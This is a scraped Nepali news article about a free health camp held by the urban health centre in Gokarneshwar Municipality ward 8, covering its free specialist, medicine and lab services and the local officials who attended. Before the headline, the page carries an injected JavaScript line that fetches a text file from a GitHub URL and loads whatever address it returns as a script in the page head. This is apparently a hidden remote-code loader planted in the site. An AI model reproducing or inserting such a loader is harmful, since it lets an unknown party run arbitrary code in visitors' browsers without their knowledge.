;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नि:शुल्क स्वास्थ्य शिबिर गोकर्णेश्वर नगरपालिका वडा नं ८ को शहरी स्वास्थ्य केन्द्रले गर्यो – जुनेली न्युज
मङ्लबार, बैशाख ३, २०८२
  • होमपेज
  • नि:शुल्क स्वास्थ्य शिबिर गोकर्णेश्वर नगरपालिका वडा नं ८ को शहरी स्वास्थ्य केन्द्रले गर्यो
Breaking News

नि:शुल्क स्वास्थ्य शिबिर गोकर्णेश्वर नगरपालिका वडा नं ८ को शहरी स्वास्थ्य केन्द्रले गर्यो

जुनेली न्युज, काठमाडौँ |
गोकर्णेश्वर नगरपालिका वडा नं ८ शहरी स्वास्थ्य केन्द्रमा स्वास्थ्य शिबिर सम्पन्न भएको छ | उक्त स्थानमा रहेको शहरी स्वास्थ्य केन्द्रको प्रचारप्रसार गरि जनताले बढी भन्दा बढी सेवा लिउन भनि शिबिर आयोजना गरिएको थियो |
May be an image of 14 people, people smiling, people studying and text
शिविरमा निशुल्क विशेषज्ञ सेवा, निशुल्क औसधि वितरण सेवा र निशुल्क ल्याब सेवा समेत प्रदान गरिएको थियो | वडा नं ८ कै कार्यलयमा रहेको शहरी स्वास्थ्य केन्द्रले वडाका बासिन्धालाई सेवा दिदै आएको छ |
May be an image of 6 people, dais and text
उक्त शिविरमा नगर प्रमुख दिपक रिसाल, उप प्रमुख सान्नानी लामा, सोहि वडाका वडा अध्यक्ष नन्दलाल श्रेष्ठले सेवाग्राहीहरुलाइ सान्त्वना दिन पुगेका थिए |
May be an image of 6 people, temple and text

फेसबुक प्रतिक्रियाहरु